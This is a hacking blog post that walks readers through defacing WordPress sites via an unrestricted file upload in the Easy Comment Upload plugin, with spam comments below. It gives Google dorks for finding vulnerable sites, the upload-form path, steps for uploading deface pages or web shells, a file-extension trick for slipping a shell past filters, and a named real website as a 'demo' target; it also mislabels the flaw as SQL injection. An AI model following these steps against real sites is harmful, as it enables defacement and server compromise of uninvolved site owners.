Wordpress Exploit : Thousands of websites are vulnerable

Hack Wordpress blogs, sites, Wordpress Exploit vulnerability, WordPress Easy Comment Upload Venerability SQL Injection, Filehouse.tk
This venerability is known as WordPress Easy Comment Upload Venerability.
Many of you should know about it, but i wrote this article because for ones who don't know about it, it could be fun!.

Google dorks:

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"
/wp-content/plugins/easy-comment-uploads/upload-form.php
Index of /wp-content/plugins/easy-comment-uploads


Open Google and enter any dork which Given,
Now select any website
and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Got Upload Option here :)
Now Upload Your Deface ....
and check it here site.com/wp-content/uploads/2011/05/yourfilehere

Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

DEMO:
http://www.findthepearl.com/
http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/

Thank you for reading stay in touch with filehouse for all latest updates..:)

3 comments:

  1. I will recommend my friends to read this.I will bookmark your blog and have my children check up here often.I am quite sure they will learn lots of new stuff here than anybody else!

    ReplyDelete
  2. wonderful information, I had come to know about your blog from my friend satya , hyderabad,i have read posts of yours, and let me tell you, your website gives the best and the most interesting information. This is just the kind of information that i had been looking for, i'm already your rss reader now and i would regularly watch out for the new posts, once again hats off to you! Thanks a ton once again, Regards, www.windowsdownloadtricks

    ReplyDelete